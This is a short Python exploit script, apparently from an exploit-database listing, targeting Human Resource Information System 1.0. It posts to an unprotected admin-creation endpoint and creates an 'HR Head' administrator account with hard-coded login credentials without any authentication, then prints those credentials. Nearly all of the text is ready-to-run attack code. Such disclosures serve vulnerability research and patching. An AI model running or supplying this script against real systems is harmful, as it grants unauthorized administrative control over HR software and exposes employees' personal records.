# Exploit Title: Human Resource Information System 1.0 - Create Admin Account (Unauthenticated) # Exploit Author: Richard Jones # Vendor Homepage: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html # Version:1.0 # Tested on: windows 10 (build 19041) + xampp v3.2.4 #!/usr/bin/python3 import requests BASEURL="http://localhost/HRI/" #Change Base url to target path ADDURL="/Superadmin_Dashboard/process/addhradmin_process.php" s = requests.Session() print("\nHuman Resource Information System - Create Admin Account (Unauthenticated)") print("Created On: 04/05/2021\nAuthor: Richard Jones\n") print("[-] Checking Host") r = s.get(BASEURL+ADDURL) if not r.status_code == 200: print("[!] Host Error, Check URL...") exit(0) print("[+] Creating Admin account") data = { "hr_companyid":"6544", "hr_firstname":"admin", "hr_lastname":"admin", "hr_middlename":"admin", "hr_contactno":"05555551231", "hr_type":"HR Head", "hr_email":"a@a.com", "hr_password":"admin4", "hr_admin":"" } r = s.post(BASEURL+ADDURL, data=data) if 'Insert Successfully!!!' in r.text: print("[+] Account Created!") print("[+] Login Credentials Created:\n a@a.com:admin4\n\n")